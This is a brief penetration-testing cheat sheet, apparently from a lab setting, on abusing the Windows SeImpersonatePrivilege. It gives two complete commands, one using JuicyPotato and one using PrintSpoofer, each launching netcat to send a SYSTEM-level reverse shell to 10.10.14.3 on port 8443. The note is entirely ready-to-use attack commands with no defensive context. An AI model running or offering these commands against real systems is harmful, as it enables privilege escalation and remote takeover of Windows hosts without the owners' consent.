SeImpersonatePrivilege

Using juicypotatoe to get a reverse shell

JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

using printspoofer to ctach a reverse shell with system privileges

PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"